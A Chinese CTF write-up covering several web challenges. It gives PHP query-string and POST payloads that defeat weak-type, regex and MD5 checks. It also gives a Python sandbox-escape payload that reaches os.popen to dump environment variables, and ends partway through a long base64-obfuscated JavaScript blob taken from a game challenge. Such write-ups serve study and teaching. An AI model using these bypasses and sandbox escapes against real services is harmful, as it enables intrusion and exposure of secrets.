第九届中国海洋大学信息安全竞赛wp

Web

ezPHP

<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);

$a = 'O.U.C';

$query = $_SERVER['QUERY_STRING'];
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
    die('听说你是黑客');
}

echo '你知道b等于什么能绕过这个弱类型吗（〃｀ 3′〃）'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
    echo "哎呦，不错喔".'<br>';
    $O_U_C=$_GET['O_U_C'];
    if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
        echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
        if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
            echo '好，那么好'.'<br>';
            if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
                echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
            }else{
                echo '告诉你secret的md5值也无妨，反正哈希是不可逆的๑乛◡乛๑，除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
            }
        }else{
            echo '不过如此';
        }
    }else{
        die("不行嘛(´ｪ｀)");
    }
}else{
    echo '嗨害嗨  (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}

parse_str可实现变量覆盖
O_U_C可以通过O U C或者O+U+C转换
https://blog.csdn.net/mochu7777777/article/details/115050295
这篇的文章里没有提到加号
preg_match('/^100$/',$O_U_C))，从头匹配到尾，换行符%0a截断一下
可以学习下面的文章
https://www.cnblogs.com/20175211lyz/p/12198258.html
MD5强比较用数组绕过

md5($secret.urldecode($_GET['md5']))
和
md5($secret.'ouc')
都这样了，直接利用，再设置cookie的md5等于当前的md5值

?a=240610708&b=s878926199a&O+U+C=100%0a&md5=ouc
POST: md51[]=1md52[]=2

菜狗工具#1

from flask import *
import io
import os

app = Flask(__name__)
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__', 
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
    (key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxxxxx}"

@app.route("/")
def index():
    return redirect("/static/index.html")

@app.post("/run")
def run():
    out = io.StringIO()
    script = str(request.form["script"])
    
    def wrap_print(*args, **kwargs):
        kwargs["file"] = out
        print(*args, **kwargs)
    new_builtins["print"] = wrap_print

    try:
        exec(script, {"__builtins__": new_builtins})
    except Exception as e:
        wrap_print(e)
    
    ret = out.getvalue()
    out.close()
    return ret

app.run('0.0.0.0', port=9001)

Flask框架，很明显，我们当SSTI做就好了
payload
print("".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('env').read())

至于这个__subclasses__()[132]是怎么得来的呢，可以学习
https://www.cnblogs.com/fdxsec/p/17793743.html
是根据<class 'os._wrap_close'>的位置得来的
官方payload
print(print.__globals__['flag'])

菜狗工具#2

不会啊，得看大佬的wp学习

贪吃蛇

好吧，这种游戏不是我能玩的

爆率真的高

发现

eval(atob("ZnVuY3Rpb24gXzB4NGQ0NShfMHhkMWI2NTksXzB4YWQ3NmIpe3ZhciBfMHgyMjg0NGQ9XzB4MmE4MygpO3JldHVybiBfMHg0ZDQ1PWZ1bmN0aW9uKF8weDQ0MmU3MCxfMHgxYzM1OTgpe18weDQ0MmU3MD1fMHg0NDJlNzAtKDB4MTRmNSsweDFjYjcrLTB4MmZiZCk7dmFyIF8weDFmYzkzMz1fMHgyMjg0NGRbXzB4NDQyZTcwXTtpZihfMHg0ZDQ1WydSU25rVkknXT09PXVuZGVmaW5lZCl7dmFyIF8weDNlNWRkOT1mdW5jdGlvbihfMHgxY2QzMjEpe3ZhciBfMHgzZGU2MTQ9J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5Ky89Jzt2YXIgXzB4MWMzNDcyPScnLF8weDFlMDNjMj0nJyxfMHg0NWI4YjE9XzB4MWMzNDcyK18weDNlNWRkOTtmb3IodmFyIF8weDU3YmVhZD0tMHg0M2UrLTB4NGQ5Ki0weDUrLTB4MSoweDEzZmYsXzB4MmM0YmY4LF8weGM2NjRhNyxfMHg1ODhlNTY9MHgzKi0weDc1ZisweDEqMHgyMDFkKy0weDgwKjB4MTQ7XzB4YzY2NGE3PV8weDFjZDMyMVsnY2hhckF0J10oXzB4NTg4ZTU2KyspO35fMHhjNjY0YTcmJihfMHgyYzRiZjg9XzB4NTdiZWFkJSgtMHg3YTQqLTB4NCsweDIxYjcrMHgxKi0weDQwNDMpP18weDJjNGJmOCooMHgyMWU3Ky0weDQ1MistMHgzKjB4OWM3KStfMHhjNjY0YTc6XzB4YzY2NGE3LF8weDU3YmVhZCsrJSgtMHhkNzcrMHgxYmE5Ky0weGUyZSkpP18weDFjMzQ3Mis9XzB4NDViOGIxWydjaGFyQ29kZUF0J10oXzB4NTg4ZTU2KygweGZkMSstMHgzMTgrMHgxMSotMHhiZikpLSgweDk4ZisweDEqMHgxYzgzKy0weDEqMHgyNjA4KSE9PTB4MWMyNCsweDIxMDArLTB4MioweDFlOTI/U3RyaW5nWydmcm9tQ2hhckNvZGUnXSgtMHgxNjIqLTB4MTgrMHhjMiotMHgxMystMHgxMWNiJl8weDJjNGJmOD4+KC0oLTB4MjQwYystMHgzNCotMHgxMisweDIwNjYpKl8weDU3YmVhZCYweDIyOGMrMHgzZDQrLTB4MjY1YSkpOl8weDU3YmVhZDoweDcqMHg0YzMrLTB4OTE2KjB4NCsweDMwMyl7XzB4YzY2NGE3PV8weDNkZTYxNFsnaW5kZXhPZiddKF8weGM2NjRhNyk7fWZvcih2YXIgXzB4MTA5ZmIzPS0weDE1NTQrLTB4MTRiNisweDJhMGEsXzB4NTQwNTQ0PV8weDFjMzQ3MlsnbGVuZ3RoJ107XzB4MTA5ZmIzPF8weDU0MDU0NDtfMHgxMDlmYjMrKyl7XzB4MWUwM2MyKz0nJScrKCcwMCcrXzB4MWMzNDcyWydjaGFyQ29kZUF0J10oXzB4MTA5ZmIzKVsndG9TdHJpbmcnXSgweDEqMHgyNzAxKzB4NjgqMHg0Ky0weDI4OTEpKVsnc2xpY2UnXSgtKC0weDEqMHgyMjhiKy0weDIqLTB4MTFkNCsweDExYiotMHgxKSk7fXJldHVybiBkZWNvZGVVUklDb21wb25lbnQoXzB4MWUwM2MyKTt9O3ZhciBfMHg0MDI5Zjg9ZnVuY3Rpb24oXzB4ZmIzNGVlLF8weDUzOTY4Yil7dmFyIF8weDU4OGUzNT1bXSxfMHg1MjM3N2M9MHgyZDQqLTB4NysweDdiYisweDEqMHhjMTEsXzB4NWIyZmNkLF8weDViNTVkYT0nJztfMHhmYjM0ZWU9XzB4M2U1ZGQ5KF8weGZiMzRlZSk7dmFyIF8weDFhY2E3Zjtmb3IoXzB4MWFjYTdmPTB4MWRhMSstMHgzMjYqLTB4NSstMHgyZDVmO18weDFhY2E3ZjwtMHgxN2E3KjB4MSstMHgxKi0weDE4MmYrLTB4MSotMHg3ODtfMHgxYWNhN2YrKyl7XzB4NTg4ZTM1W18weDFhY2E3Zl09XzB4MWFjYTdmO31mb3IoXzB4MWFjYTdmPTB4ZDlmKzB4ZWI0KzB4MyotMHg5NzE7XzB4MWFjYTdmPDB4MTM0ZSotMHgxKy0weDEqMHgxNDEzKzB4Mjg2MTtfMHgxYWNhN2YrKyl7XzB4NTIzNzdjPShfMHg1MjM3N2MrXzB4NTg4ZTM1W18weDFhY2E3Zl0rXzB4NTM5NjhiWydjaGFyQ29kZUF0J10oXzB4MWFjYTdmJV8weDUzOTY4YlsnbGVuZ3RoJ10pKSUoLTB4MTM4ZSotMHgxKy0weDI0OGIrLTB4NWZmKi0weDMpLF8weDViMmZjZD1fMHg1ODhlMzVbXzB4MWFjYTdmXSxfMHg1ODhlMzVbXzB4MWFjYTdmXT1fMHg1ODhlMzVbXzB4NTIzNzdjXSxfMHg1ODhlMzVbXzB4NTIzNzdjXT1fMHg1YjJmY2Q7fV8weDFhY2E3Zj0tMHhjNiotMHg2Ky0weDEqMHg5YWQrLTB4NTA5Ki0weDEsXzB4NTIzNzdjPTB4NTE4KzB4NTMqMHgxOSstMHhkMzM7Zm9yKHZhciBfMHgxMGRmMjA9MHhkNjYrMHgxYmViKzB4NWU3Ki0weDc7XzB4MTBkZjIwPF8weGZiMzRlZVsnbGVuZ3RoJ107XzB4MTBkZjIwKyspe18weDFhY2E3Zj0oXzB4MWFjYTdmKygweDg0OCstMHgxKi0weDU1OSstMHhkYTApKSUoLTB4NjRjKy0weDI2NSotMHg5Ky0weDU5KjB4MjkpLF8weDUyMzc3Yz0oXzB4NTIzNzdjK18weDU4OGUzNVtfMHgxYWNhN2ZdKSUoMHgxKjB4MTU2NysweGJkNSsweDIwM2MqLTB4MSksXzB4NWIyZmNkPV8weDU4OGUzNVtfMHgxYWNhN2ZdLF8weDU4OGUzNVtfMHgxYWNhN2ZdPV8weDU4OGUzNVtfMHg1MjM3N2NdLF8weDU4OGUzNVtfMHg1MjM3N2NdPV8weDViMmZjZCxfMHg1YjU1ZGErPVN0cmluZ1snZnJvbUNoYXJDb2RlJ10oXzB4ZmIzNGVlWydjaGFyQ29kZUF0J10oXzB4MTBkZjIwKV5fMHg1ODhlMzVbKF8weDU4OGUzNVtfMHgxYWNhN2ZdK18weDU4OGUzNVtfMHg1MjM3N2NdKSUoLTB4MjZlOCstMHgyZDkqLTB4OSstMHgyYiotMHg1NSldKTt9cmV0dXJuIF8weDViNTVkYTt9O18weDRkNDVbJ1pSUG52ZSddPV8weDQwMjlmOCxfMHhkMWI2NTk9YXJndW1lbnRzLF8weDRkNDVbJ1JTbmtWSSddPSEhW107fXZhciBfMHg1ZDFlMWU9XzB4MjI4NDRkWy0weDcwMSsweDIyYjErLTB4MTAqMHgxYmJdLF8weDVlOWYxZT1fMHg0NDJlNzArXzB4NWQxZTFlLF8weDNjOTViNj1fMHhkMWI2NTlbXzB4NWU5ZjFlXTtpZighXzB4M2M5NWI2KXtpZihfMHg0ZDQ1Wyd0dFVrengnXT09PXVuZGVmaW5lZCl7dmFyIF8weDVkMTkyMz1mdW5jdGlvbihfMHg0MDYyNWUpe3RoaXNbJ1ZiTmhKQSddPV8weDQwNjI1ZSx0aGlzWydXalNGTlUnXT1bMHgxKi0weDFiNjkrMHgxZCotMHhkZisweDM4MyoweGYsMHgyKi0weGZlKzB4MTUqMHgxYmQrLTB4MjI4NSwtMHgxKjB4MTU2NCsweDIzMWErLTB4ZGI2XSx0aGlzWydFZnNMbW4nXT1mdW5jdGlvbigpe3JldHVybiduZXdTdGF0ZSc7fSx0aGlzWydOQk1qWm4nXT0nXHg1Y3crXHgyMCpceDVjKFx4NWMpXHgyMCp7XHg1Y3crXHgyMConLHRoaXNbJ3FIRnl6cyddPSdbXHgyN3xceDIyXS4rW1x4Mjd8XHgyMl07P1x4MjAqfSc7fTtfMHg1ZDE5MjNbJ3Byb3RvdHlwZSddWydrVE13R1InXT1mdW5jdGlvbigpe3ZhciBfMHgyODMxY2E9bmV3IFJlZ0V4cCh0aGlzWydOQk1qWm4nXSt0aGlzWydxSEZ5enMnXSksXzB4OGU5ZDI2PV8weDI4MzFjYVsndGVzdCddKHRoaXNbJ0Vmc0xtbiddWyd0b1N0cmluZyddKCkpPy0tdGhpc1snV2pTRk5VJ11bMHgxZDAxKzB4MioweDIwKy0weDkwKjB4MzRdOi0tdGhpc1snV2pTRk5VJ11bMHhjOCotMHgyKy0weDIxNTcrMHgyMmU3XTtyZXR1cm4gdGhpc1sncXB5dVNVJ10oXzB4OGU5ZDI2KTt9LF8weDVkMTkyM1sncHJvdG90eXBlJ11bJ3FweXVTVSddPWZ1bmN0aW9uKF8weDExYjMyNyl7aWYoIUJvb2xlYW4ofl8weDExYjMyNykpcmV0dXJuIF8weDExYjMyNztyZXR1cm4gdGhpc1snTUNUbGliJ10odGhpc1snVmJOaEpBJ10pO30sXzB4NWQxOTIzWydwcm90b3R5cGUnXVsnTUNUbGliJ109ZnVuY3Rpb24oXzB4MmQ4NGNmKXtmb3IodmFyIF8weGU1MzlmPS0weGYxZSsweDEqMHgxZjliKy0weDEwN2QsXzB4MzJmMGQ1PXRoaXNbJ1dqU0ZOVSddWydsZW5ndGgnXTtfMHhlNTM5ZjxfMHgzMmYwZDU7XzB4ZTUzOWYrKyl7dGhpc1snV2pTRk5VJ11bJ3B1c2gnXShNYXRoWydyb3VuZCddKE1hdGhbJ3JhbmRvbSddKCkpKSxfMHgzMmYwZDU9dGhpc1snV2pTRk5VJ11bJ2xlbmd0aCddO31yZXR1cm4gXzB4MmQ4NGNmKHRoaXNbJ1dqU0ZOVSddWzB4MTgxOCsweGYqMHgyODQrLTB4MTQ5YyoweDNdKTt9LG5ldyBfMHg1ZDE5MjMoXzB4NGQ0NSlbJ2tUTXdHUiddKCksXzB4NGQ0NVsndHRVa3p4J109ISFbXTt9XzB4MWZjOTMzPV8weDRkNDVbJ1pSUG52ZSddKF8weDFmYzkzMyxfMHgxYzM1OTgpLF8weGQxYjY1OVtfMHg1ZTlmMWVdPV8weDFmYzkzMzt9ZWxzZSBfMHgxZmM5MzM9XzB4M2M5NWI2O3JldHVybiBfMHgxZmM5MzM7fSxfMHg0ZDQ1KF8weGQxYjY1OSxfMHhhZDc2Yik7fXZhciBfMHg0MmQ2NTM9XzB4NGQ0NTsoZnVuY3Rpb24oXzB4M2RlOTU4LF8weDJiOTc3OCl7dmFyIF8weDVhOTJjYT1fMHg0ZDQ1LF8weDUzODRhNj1fMHgzZGU5NTgoKTt3aGlsZSghIVtdKXt0cnl7dmFyIF8weDFiNTVkOD1wYXJzZUludChfMHg1YTkyY2EoMHgyMWQsJyZoZV4nKSkvKC0weGU1OCsweDIqLTB4MTFlZisweDMyMzcqMHgxKStwYXJzZUludChfMHg1YTkyY2EoMHgyMTYsJzAzQXcnKSkvKC0weDJiMyotMHgxKzB4MTQqMHgyMistMHg1NTkpK3BhcnNlSW50KF8weDVhOTJjYSgweDIwZiwnQGwqZCcpKS8oMHgyKi0weGQyMisweDEqLTB4ZTAzKzB4Mjg0YSkqKC1wYXJzZUludChfMHg1YTkyY2EoMHgxZmYsJzFNYzAnKSkvKC0weDE4M2YrLTB4MjMwKy0weDI1Ki0weGI3KSkrcGFyc2VJbnQoXzB4NWE5MmNhKDB4MjI2LCc2eGIkJykpLygweDFmKi0weDFmKzB4MjFiZSstMHg4OSoweDM4KSoocGFyc2VJbnQoXzB4NWE5MmNhKDB4MjA2LCcmSHRbJykpLygtMHgxKjB4NGIzKy0weGQwNSstMHg4ZGYqLTB4MikpK3BhcnNlSW50KF8weDVhOTJjYSgweDFmMCwnaTFubycpKS8oMHgyMDM0Ky0weGRmOCstMHgxMjM1KSstcGFyc2VJbnQoXzB4NWE5MmNhKDB4MjE4LCd3QTh0JykpLygtMHgxZjFmKy0weDExOGMqLTB4MSsweGQ5YikqKHBhcnNlSW50KF8weDVhOTJjYSgweDIwMCwnQWRBRicpKS8oMHhhOTArMHhhNjEqLTB4MSstMHgyNikpK3BhcnNlSW50KF8weDVhOTJjYSgweDIyMiwnZUZVOScpKS8oMHgxYmMwKzB4MjkqMHg5MistMHgyMjEqMHgxOCkqKHBhcnNlSW50KF8weDVhOTJjYSgweDFmNywneXN6VicpKS8oLTB4MjM4MystMHgxZWZjKzB4NDI4YSkpO2lmKF8weDFiNTVkOD09PV8weDJiOTc3OClicmVhaztlbHNlIF8weDUzODRhNlsncHVzaCddKF8weDUzODRhNlsnc2hpZnQnXSgpKTt9Y2F0Y2goXzB4MjRlMmEzKXtfMHg1Mzg0YTZbJ3B1c2gnXShfMHg1Mzg0YTZbJ3NoaWZ0J10oKSk7fX19KF8weDJhODMsLTB4YTZhMzUrMHgxZmQ5KjB4NDkrMHgxKjB4ODM0NzEpKTtmdW5jdGlvbiBfMHgyYTgzKCl7dmFyIF8weGViODk0Nz1bJ2U4azBFM1JjU1cnLCdXNGUxJywnVzVxQicsJ1c2L2RTcScsJ2ZYTE9jOG9XeW1rZUJTa0tlU2tCQVcnLCdXNkR2V1IzZEhhYmxyOGt2VzQvZEg4aytXN3knLCdobW9FVzVPN0N0NG1EOGs0bUtpJywnRThrNXZhJywnV1FSY1Y4b0FXNEJkUDhrOWtyTmRVQ29nQjhvaFdRbGNMdXRjT3ZqeVc0cGRIQ29VRUNvV1dPT3VsWkZjUk1yNldRRENXN0ZkU0lwZElMbGRIbW8yam1rK2Zta0ZXUUZkSk5GY0dHdGRNcWRkTUNvVWtNMXdXT3llQzBHZmhZUmRRWDVnVzVmelc2RmNPTGZkbDhrNEVDb29XNXo0dThrZ1dQMHpxdlBxeElxeFdSWGVvOG9SV1F4ZEhLdGNUSmRkSjhvMmk4a1N5eDVFbmJ2ZWY4a2RiU2tHVzZ4Y0h1WHl6bW9uV1A1c3JDa1liMmZweFNrNFc0eGRVU29EVzZpVHdTbzhXNk9NZ3dKY0h1VmNUU29wcDBCY1RoUmNIWkhaVzRiYmwwWmNNTFQwVzUvY01MRG9XUldkV1JsY1FDa3hXUWxjSFNvWXZDa0xXUFNYVzVUd1c2ZGNJSXBjUDhvM2J0NVdDQ2tLbkNvRnNDb2tXNkN4V1JkZFZTb3dXNGZIVzQ5SGRTa3FXNUNVV1J4ZFJta05FQ29PVzdDSVdQT0FXUDlyVzU1SWdtb3d2bWtZVzZOZElxaWJXUk5kSW1vb1dQcGRKU28waWFSY1NneGNWQ2tvRW1vd1c2cjdrTDFKV1FtSVdRZThXT2xkTWc3ZEp4T1BlU29BRk1GY0lYcm9nOGtRVzZ1M1c1eGRNOGtaVzU0UWZDbzFXNEdjV1JaY1Zta3NBQ2t0VzU5T0M4azFxU2s2V09tQVc2VGNXNGkyZFNvNnltb2VuczFaQkNrVVdPUmRLOG9IV1FDa1c1ZGNKbWt3dWJsY1MyQmRUMHBkUVNrSVdPQmRPQ29ORThrQnZZRmNLYWZ2VzZ1VFdSWENXNzQrRXdmd1dSeGNOQ2tPbW1vTXNDbzh6U28zczJsY00zcUdXUVZkU0pGY1ZDb21FQ2tLY05oZFFDb1JXT0JkS0NvK1c1UmRUdFpkVXVQenhxck5XNWRkTDhvREJjeW1XNE5kUjAvZEpDb2xXT2J5ZzhvVnBYN2RIRzdkVm1rVWdDb25kQ29XenZ4ZE5OeGNVc0hpYUloZEdDb0VXNkpjVENrb1dQTmNPQ282QjhrYmZJNE94Q29ucFNvVHVlcm1pbW8wV1BkZEcxbU1XNnZ2V1A3Y1VicUFwOGtOVzR5V3c4a25XNU5kSmgzZE9IM2RSSGE5VzZyelc1UzVXNHlIVzdHbVdScVpuU2tSbmdOY084a2F3OGtyV09uTldROGdXUFdxVzRua1dRWCtXN3lhVzRHc1c0SGVXUnZrVzU0SGdHOHVyOG9XV09iRldSN2RUOGtnYVo1cHRDa3JhZnBkUFdsZE9Tb2NoOGtCVzREaVdPZTNyU2sveW1vZ2tHRmRKQ2syQm1vZFdRVmNRbW9xVzZpM2licGNPU2tCem1remhHUHFXNWorVzVHUWlxMGdiSUtrVzZ4ZFVKWGJXNXY4VzRlUFc1ZS93d25UVzVaZExtb0lXT2RkVXM0cVc1NGdibWtLV1EvY0dDazBCQ296bkNrbFdRQmNSdk9nVzcvZEg4b1BrOG9zV096bVc3dGRVTU5jVENrQUZ3U3lXUnRkUG1vaEZLbTNXNnRjUFNraUQwUmNQZU5kR0NvbGpmSDZyc0dleVovZFNta2RiSUw2VzVSY1FJbGNNcVhQb3JGZFBTa1RXTy9kUThvdldRdkRXUnhjTk1aY0hkUHNFTXZaYjNWZE9jeGNQdE5kSTA4aldRSmRTMVh0dFl6Vlc0NWpXUUJjSlg4dkFTa0hXNjlKVzU3Y1BDb2NiU2swVzd5QXNieGRLZEhBVzRKZFZtb2ttQ2tmV1JkY0xDa3lXUDdkR0NvRnl0RmRSdDNkTlp0Y1NDb2dtc21LRHVwZEdta1dxOG9rV1BtUVc0VmNOSm1tRG1vdGpOYWdXNi9jTG1rWFdQM2NOYVZjVVNvWlc0VmNJdzhkV1FpU3RDa1lqVzNjUU1mSFdROUhwSzg2VzZIQldQcUNzTmlNVzZQUFc1bGRIbW9ocm1vRFdQYVZyOGtyV094ZEp4M2RRQ295VzUzZFV4bkVXT0ZkSWZqOHE4b0ZXNi9jUUNvNVc2R2hpWG5ZV09aY1F3T1JXUG13VzZ6WFc3ZmZnbW9Rd0tkY09Da3BwQ2tJV1JPSm1ZOG9qOGtEVzVoY1BTb3NkOGtYV1BtNVdRQ3ZyYlJkTVptOVdSdGNQU29sVzRaY0p4RFFpWXBjVThrcWdMWmNHY1BEbDhvUHE4by9vcXZYcUNrR1dRbWRXT2Jkclg4dWhTb25EbWs1anRXRHM4b0p4Q2tjejFtN1dSM2RNS1N1ZlpwY1Q4a1JXUWl2cVhyT1c3UmRJQ29sV083Y1BKL2NWOG9vVzUzY084a01XN2lyYUNvL1dPSmNMMERmV1JoZExodVl2WmJXVzc3Y1Y4a1FxbW9PVzZXdFc2T0FxSUpkRzhvYVdQWmRSWTdjT0NrK1dSSmNUSVZkSGFEd2Nta1ZxWldwYm1rS1dPL2RVMEN5eENrNGF4WEhCbW9FcDEzY1Q4b2xXUGxjVUNrc2F1NEdXN3F2V1JiT1c3TytXUHBjSkw5dFc2ekpyV3RjVXJxVWR1cGRRSUZjSTN6VVdRaGNQMHhkVmRoY0xta0l4Q29YQ2VOY1AyTFZXT0ZjUGE4QVdQakRiOG9uV1I5Rm1jVDZXNDNkSThrQVdRYWl2Q29JeFNvbXY4a2V6Q29DV1BqSlc2YUNXNjNkTFNraHNKbWtXNEZkSjhrcVdSQmRHMTdkTVNvRHE4b2VXUWVBdThrOGpLQmRIOGtoV1FaZFRZRE93dW5KV1JCZElNR095V2RkVm1rRG9YZGNTbWtUVzdaZEkyZGRVM2xjTG1rTVdQL2NLOGtQVzU0dVc2ZGRIQ283VzVDY3JTazhXUEN5VzZGZFZDb3RXT0JjT1NrR0Y4a3d2YW5zVzdoZFQyWmNVZjkzV1BGZFVDa3pwdFZjS0tlSWYwdGNWWUdNV1BIQnJta1NXUHRkTm1vTldRYktXUWV5V1BxeFdPMGNXUWxjTkNreVc2M2RMOG9PVzZKZFFmQmRRU29SVzZiNm5lRmNPaFZkTVNvOWUzZktXNXRjUVcvY09TbzhXNDdkSkNvc1dPWmRMSHFBdDhrbG8wRmRIU2thV09qZVc0ZmpXNHBkSThraVdRL2RLU295VzRwZFNTbzVXUFJkTEhWZE5XR0VXNEduV1BISVc3QmRSSURHdkNvQnd0eGRJbW9ZV1E3ZElTb1BrMTNkTHFqUldPS0RlU2t1V1BOZFNTb1hXUmU0dTMxd0ZYNUhvQ29EaW1rSVc2Ym9kS2xkSzhvbGF0bGNLbW8xV1AwR1c3cGRNR2puRThvcGVXQmRPMEJkTVNvbEN1R0tXUER0VzdyUFc2VENXNjFVV1BDaFdPM2NUTFZkSm1vdFdQbU9XT1ZkUk5aZFRTa2t0aHRkVllaZEttay95U2tZYThvZldPRHRXT3VhcXZOY09tb2VXN1pjSVNrVlc3OEdjM3pzV08wV1c3THFXNVR5VzVLSXAxL2NWS3BjVm1vTFc2aGNPU2tQVzYxYWl3M2NMR0JkSkNrRXJJTmNOU2tRVzU4U29TbytXNlJkTDhrdldRbmtXUnpmV090ZEttazZrQ283VzZMaFdSSmNIZ0t5VzVIMVc0aGNVbWtGbThvVFc0blFGQ2tWVzZPTnRTa2tuTnZFV1AzY0dTb2FXN2RkU21vL1c3YjVXTzRCV1F0Y1BZcGRIZ3VhaExEcnloM2NSU29GVzdOZEplZGRHV0h5QVNvUENjTmRUOG9ZV095enZ1M2NVc1NBQndkY1BDa1NXTzl3bVNvMUVlenBXN25zV1BWZExTa2p1Q2tyVzc3Y014aGNLbWsvYk5ycGhTa0FXUjRtQU00VUJtb2ZXNGRjTkNrVFdSZlF0V2F2Vzd5eGtTa2xqU2t1d0hWZFRDbzRDdTE1dnQzZFVnVmNPbWtHblNrZ2xOaGRMYUJkU21vR3pDa01GQ29aV09OY0sybGNKZGhkUzBtR1dRbGNNbW9ja0o1c2dDazlsSFJjTjhveGJDa3BXTzVNVzZEWVc2SFRhU29CeDJ0ZFBta3RuOG9EY0poY0lDa2xld3BjVHVoZE44b0dpOG9naVlmWHJtb3VXT2xkTXZCY0dkRmNTbWs2a21vRVdQMW9XUnZNbDJGY1RMSmNKZjBNV09XcldSM2NWU294c0NraldSNHVXUldrcVNvQ1dQOU54OGtJdTB0Y0phaTlXUTlxV1BUamk4a21XNVREV090Y0pjOVd2ZFgydENrMlc3djJoVzdjUnNlK3Zta1lXNGhkUDhvM1dScjN0U285V1EzY0s4a21XNVR0VzQzY09iUmNUQ28vVzY4M3pDb1ViU2tHV1BoY1Vtb2pXUHViVzdCZEdTa1pXNEJkSGVoZFFTbzNxOG92RENrd1c1UmNOQ2tuVzViV0E4azlXNHYxVzQzY1BIaGROcldJV09GY1NlbmNXUnpSaUNrY1c1dGRWbW82V1JqdHptbytrY25UVzV1SHZta0h6U29zbW1vaVc1dGRQTXFNV1IvZEwxdGNTU2thVzROZFRta2NrbWt3VzQzZEhDb01XT0MvbnF2RGU4b0xqOG9MV1JkZE9jblZXUXE5QmgzY1AwR21GbWtpVzQwVVc1M2NIU2tSQmcvY0ttby9GdUw3eHRwZFRTbzJXUmxjUGN1UWFXVHhXTzNkSzhvTGNTbzdXUkJjU1NrRVdRYkRXNldmeUpOY1Ztb2tqZVpjUzhvd1c0ZGRObWthVzZuR1dSL2RPTjQ3amg3ZFZDb2pXNU9VVzdTelc1OTl3OG81V1B4ZEc4b2ZXUVNYVzVsY0l0VGVtZkJjVGMzY0tlU2tXN1ZjT0Nva1c0em1XN3p1Vzd0Y09TbzlvQ2s1cDNmZXZTa2x0bWtXVzczZFVtbzlXNWhkTUNrM2NJQmNWcUM5V1FyU1c3bGRIdUJjS0NvWlc2ZGNSTDEyZ2RWY1Ztb3BXNTNkTWEwOEVta0dlbWtTV08wb1dSTGhkOGtZRHZ6d3lnM2RHQ2tKVzR1dUZTb1B1MlMvV1E1NmY4a1dxU29RQVNvZW5ySmRIMW1XRU1CY0p2N2RUTkthV1BMdXNLbGRWQ29oalNrTEVtb1FXUjdjSkNvUldRRmRQeDNkSlNrcGhtb1hXUW4zVzQ3ZEttb2VXNEJkT21vNFdRTFBXNmRkUDhvSmlJL2NWVzBiczhvdVdQZGRQU29Fc04vZEc4bzRXUmZmRTJkY1EzOExXNGZTV1JuT1dReGNVOGs4V1B6ZXIwUmNHbWswY0NrVGZMSEp5VzRmelNvNVc3ZGNMWGpiVzZWY0hYekdXTy9jVEdqaVdPOFZwQ29FV09tcFdRdnV6OGt1V1FOY1NjUmRIU290eVNrN0JtbzVXUTNkR1NraHBjcWlXNGRkUDAwcnlkNUZXUXVmVzYxNlc3V1p1WS9jTzhvdFc3WmRKbWtNRkdiTHFKekNXNVNzV1FKZFIwbVpGbWtMV1BuOVdSNU5sTXBjSkNrbXVTb09XUi9jTFNrWHBiMVZpU29pQlpPM1dPM2RNdER2V1FXNWtyUHJ6dWhkT0NrMVc3VmRNbW9qRkNrQ1dRSmROOG9CeWNUUlc1SHRjQ29JV1FUYXR2cm1zTU5kSXI1MXI4azVFVy9kSkNvUWk4a29XN3YyVzY1blc3dGNUbWtwbnVHOERzM2NOckpkTlNrUmNoVzVoRzlCQmJxd1dRekxXT2RjVkwzZE1HZGRHOGszdG1vUXRhNVdXNmxjUlNrQ2RmalJXUDhrV1FGZFY4b1dXUWRkTVNrMFdQeGRQOGtyakNrZHhta2tkOG9sZzhra1c0WC9XTzVTYkhsZExlNUNXN1pjUEg4Z0I4b0h6bWt5Y2dPeVc0YWp3Q2tLVzVDaERTazZsQ282Vzc1WldSTG1jQ29IenNCY1Vta2hGU29IV1JkZEtNN2NVU2tHbkNrU1c1SmRHQ2sxVzVyYldSUmNTU29SZGRDaldQOGlyTEpjUDhvMldSMDVXN3RjSWREWlc3eGRSSUpjT3dtMFdSYW9xU2toZUt1a1dPcXZXNTBOV1ExckY4b21XUFJkTFNveVc3enFXT3RkTzhrdmdtb0R0OG9CRkdkZEpjMHFvQ29JbG1vMldQYkRXNWxkSFhKZFR4VmNTYy9kU21vMVdSMUd4U29NVzZGZEl0U1RqV3prVzdSZFVta3FXUWhkR0Nrb1dPS2JXNnZWV09IeFdSdGRRTkNLV09hZW5IaGRMTDBZRHV0ZE9Tb2xlSEpjTlNvS0ZnU2pXNUZkVkdEbWUyNThyOGs5dUNvbFdSWmRKQ282VzVaY0tnSFdhbWtCV09QTVdPN2NMU280ZUpWY01JSmNQMUdWVzROY0lDa015bW9EV09kY08ySmNHSnhjU21vRlc1NExzbWtwcENraVdRdGRIMnRjUkx2MWNtbytXT05jTUNrN2V1QmRHRycsJ2tTa2luV1JkU0hXQ3pTa2tjdUZkVUxXJywnV1FLTCcsJ2pTa3FXUHUzcDhrNlc2UGRXUFJjSXh5TVdPVmNSVycsJ2xDa1FnYlZjUGEnLCd5MjdjU21vUXpDb0VXUXZ4amdLUXVXJywnZlc5TXEwQmRSbWtUJywnbFl4Y0xLTmRPU284aENvMldQSmNUWGEnLCdXT2Z0aVNrZFdQeGRHTW1va0cvZFBLVycsJ1c1Q2wnLCcnLCd2ZkhNc3dsZFVTa2ZXNGknLCdBTTNjU21vSGJta2xXUVhxbTF1JywnVzVXaVdRVmRLbWtoV1JGZEt3SycsJ2ZmN2NVc2hkTUhmaGJDazFFbW9IJywnaGdkZE9yOGhxbW9BVzRpJywnZzhvd1dS